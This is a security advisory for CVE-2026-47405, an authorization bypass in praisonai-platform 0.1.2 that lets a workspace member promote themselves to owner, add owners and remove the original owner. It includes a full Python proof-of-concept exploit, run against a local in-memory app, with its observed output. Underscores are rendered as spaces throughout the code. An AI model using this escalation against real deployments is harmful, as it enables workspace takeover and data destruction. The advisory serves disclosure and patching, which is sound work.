CVE-2026-47405

Summary

• promote their own account from member to owner;
• add arbitrary users as owner or admin;
• change other members' roles;
• remove legitimate owners or members;
• take over workspace membership completely;
• perform destructive workspace operations after escalation.

Details

praisonai platform/api/deps.py

async def require workspace member(
  workspace id: str,
  user: AuthIdentity = Depends(get current user),
  session: AsyncSession = Depends(get db),
  min role: str = "member",
) -> AuthIdentity:
  ...
  has = await member svc.has role(workspace id, user.id, min role)

Depends(require workspace member)

praisonai platform/api/routes/workspaces.py

PATCH /workspaces/{workspace id}
DELETE /workspaces/{workspace id}
POST  /workspaces/{workspace id}/members
PATCH /workspaces/{workspace id}/members/{user id}
DELETE /workspaces/{workspace id}/members/{user id}

praisonai platform/services/member service.py

async def add(...):
  member = Member(workspace id=workspace id, user id=user id, role=role)

async def update role(...):
  member = await self.get(workspace id, user id)
  member.role = new role

async def remove(...):
  member = await self.get(workspace id, user id)
  await self. session.delete(member)

TokenResponse.token
TokenResponse.user.id

Affected component

Package: praisonai-platform
Verified version: 0.1.2
Verified source commit: d8a8a78
Affected components:
- praisonai platform/api/deps.py
- praisonai platform/api/routes/workspaces.py
- praisonai platform/services/member service.py
- praisonai platform/api/routes/auth.py
- praisonai platform/api/schemas.py

PoC

1. Creates the real FastAPI app with praisonai platform.api.app.create app().
2. Registers three users through the real /api/v1/auth/register route.
3. Creates a workspace as the original owner.
4. Adds the second user as a normal member.
5. Logs in as that low-privilege member.
6. Uses the low-privilege member token to self-promote to owner.
7. Uses the same token to add a third account as owner.
8. Uses the same token to remove the original owner.
9. Confirms the workspace membership has been taken over.

Full PoC code

#!/usr/bin/env python3
"""Self-contained local replay for PraisonAI Platform workspace RBAC bypass."""

from  future  import annotations

import asyncio
import os
import sys
import types
import uuid
from pathlib import Path

from httpx import ASGITransport, AsyncClient
from sqlalchemy.ext.asyncio import create async engine


REPO ROOT = Path( file ).resolve().parents[3] / "repos" / "praisonai"
PLATFORM ROOT = REPO ROOT / "src" / "praisonai-platform"
AGENTS ROOT = REPO ROOT / "src" / "praisonai-agents"


def verify source() -> None:
  expected = {
    PLATFORM ROOT / "praisonai platform/api/deps.py": [
      'min role: str = "member"',
      "member svc.has role(workspace id, user.id, min role)",
    ],
    PLATFORM ROOT / "praisonai platform/api/routes/workspaces.py": [
      '@router.patch("/{workspace id}", response model=WorkspaceResponse)',
      '@router.delete("/{workspace id}", status code=status.HTTP 204 NO CONTENT)',
      '@router.post("/{workspace id}/members", response model=MemberResponse, status code=status.HTTP 201 CREATED)',
      '@router.patch("/{workspace id}/members/{user id}", response model=MemberResponse)',
    ],
    PLATFORM ROOT / "praisonai platform/services/member service.py": [
      "member.role = new role",
      "await self. session.delete(member)",
    ],
  }

  for path, needles in expected.items():
    text = path.read text(encoding="utf-8")
    for needle in needles:
      if needle not in text:
        raise RuntimeError(f"source verification failed: {needle!r} not found in {path}")


async def main() -> int:
  if not PLATFORM ROOT.exists() or not AGENTS ROOT.exists():
    raise SystemExit("missing local PraisonAI source tree")

  verify source()

  sys.path.insert(0, str(PLATFORM ROOT))
  sys.path.insert(0, str(AGENTS ROOT))

  # Minimal passlib stub for local replay environments where passlib is not installed.
  # This keeps the PoC focused on the authorization bug rather than dependency setup.
  if "passlib" not in sys.modules:
    passlib pkg = types.ModuleType("passlib")
    passlib pkg. path  = []
    sys.modules["passlib"] = passlib pkg

  if "passlib.context" not in sys.modules:
    passlib context = types.ModuleType("passlib.context")

    class CryptContext:
      def  init (self, *args, **kwargs):
        pass

      def hash(self, password: str) -> str:
        return f"stub::{password}"

      def verify(self, password: str, hashed: str) -> bool:
        return hashed == f"stub::{password}"

    passlib context.CryptContext = CryptContext
    sys.modules["passlib.context"] = passlib context

  # Keep JWT generation deterministic for the local replay.
  os.environ["PLATFORM JWT SECRET"] = "test-secret-for-testing-only"

  from praisonai platform.api.app import create app
  from praisonai platform.db.base import Base, reset engine
  from praisonai platform.db import base as base mod

  await reset engine()

  engine = create async engine(
    "sqlite+aiosqlite:///:memory:",
    echo=False,
    connect args={"check same thread": False},
  )

  base mod. engine = engine
  base mod. session factory = None

  async with engine.begin() as conn:
    await conn.run sync(Base.metadata.create all)

  app = create app()
  suffix = uuid.uuid4().hex[:8]
  password = "Password123!"

  transport = ASGITransport(app=app)

  async with AsyncClient(transport=transport, base url="http://test") as client:
    # 1. Register an owner account.
    owner = await client.post(
      "/api/v1/auth/register",
      json={
        "email": f"owner {suffix}@example.com",
        "password": password,
        "name": f"owner {suffix}",
      },
    )

    # 2. Register a low-privilege member account.
    member = await client.post(
      "/api/v1/auth/register",
      json={
        "email": f"member {suffix}@example.com",
        "password": password,
        "name": f"member {suffix}",
      },
    )

    # 3. Register a third attacker-controlled account.
    extra = await client.post(
      "/api/v1/auth/register",
      json={
        "email": f"extra {suffix}@example.com",
        "password": password,
        "name": f"extra {suffix}",
      },
    )

    owner json = owner.json()
    member json = member.json()
    extra json = extra.json()

    owner headers = {"Authorization": f"Bearer {owner json['token']}"}
    member headers = {"Authorization": f"Bearer {member json['token']}"}

    # 4. Create a workspace as the owner.
    workspace = await client.post(
      "/api/v1/workspaces/",
      json={
        "name": f"ws-{suffix}",
        "slug": f"ws-{suffix}",
        "description": "rbac bypass poc",
      },
      headers=owner headers,
    )

    workspace id = workspace.json()["id"]

    # 5. Owner adds the second user as a normal low-privilege member.
    added member = await client.post(
      f"/api/v1/workspaces/{workspace id}/members",
      json={
        "user id": member json["user"]["id"],
        "role": "member",
      },
      headers=owner headers,
    )

    # 6. Low-privilege member self-promotes to owner.
    promoted = await client.patch(
      f"/api/v1/workspaces/{workspace id}/members/{member json['user']['id']}",
      json={
        "role": "owner",
      },
      headers=member headers,
    )

    # 7. The same formerly-low-privilege member adds a third account as owner.
    added owner = await client.post(
      f"/api/v1/workspaces/{workspace id}/members",
      json={
        "user id": extra json["user"]["id"],
        "role": "owner",
      },
      headers=member headers,
    )

    # 8. The same account removes the original owner.
    removed original owner = await client.delete(
      f"/api/v1/workspaces/{workspace id}/members/{owner json['user']['id']}",
      headers=member headers,
    )

    # 9. Confirm remaining membership state.
    remaining members = await client.get(
      f"/api/v1/workspaces/{workspace id}/members",
      headers=member headers,
    )

    remaining roles = [m["role"] for m in remaining members.json()]

    print(f"[poc] owner status={owner.status code}")
    print(f"[poc] member status={member.status code}")
    print(f"[poc] extra status={extra.status code}")
    print(f"[poc] workspace status={workspace.status code}")
    print(f"[poc] add status={added member.status code} role={added member.json()['role']}")
    print(f"[poc] promote status={promoted.status code} role={promoted.json()['role']}")
    print(f"[poc] add owner status={added owner.status code} role={added owner.json()['role']}")
    print(f"[poc] remove original owner status={removed original owner.status code}")
    print(f"[poc] remaining roles={remaining roles}")

    if promoted.status code != 200 or promoted.json()["role"] != "owner":
      raise SystemExit("[poc] MISS: low-privilege member did not become owner")

    if added owner.status code != 201 or added owner.json()["role"] != "owner":
      raise SystemExit("[poc] MISS: promoted attacker could not add a new owner")

    if removed original owner.status code != 204:
      raise SystemExit("[poc] MISS: promoted attacker could not remove the original owner")

    if remaining roles.count("owner") < 2:
      raise SystemExit("[poc] MISS: expected attacker-controlled owners after takeover")

    print("[poc] HIT: low-privilege member became owner and took over workspace membership")

  await engine.dispose()
  base mod. engine = None
  base mod. session factory = None

  return 0


if  name  == " main ":
  raise SystemExit(asyncio.run(main()))

Observed output

[poc] owner status=201
[poc] member status=201
[poc] extra status=201
[poc] workspace status=201
[poc] add status=201 role=member
[poc] promote status=200 role=owner
[poc] add owner status=201 role=owner
[poc] remove original owner status=204
[poc] remaining roles=['owner', 'owner']
[poc] HIT: low-privilege member became owner and took over workspace membership

Expected secure behavior

PATCH /api/v1/workspaces/{workspace id}/members/{member user id}
Authorization: Bearer <member token>
Content-Type: application/json

{
 "role": "owner"
}

403 Forbidden

Actual vulnerable behavior

HTTP 200
role = owner

Impact

• self-promoting from member to owner or admin;
• granting owner or admin to attacker-controlled accounts;
• changing other members' roles;
• removing legitimate owners or members;
• modifying workspace metadata and settings;
• deleting the workspace;
• taking over workspace-scoped issues, projects, labels, agents, and other resources after role escalation.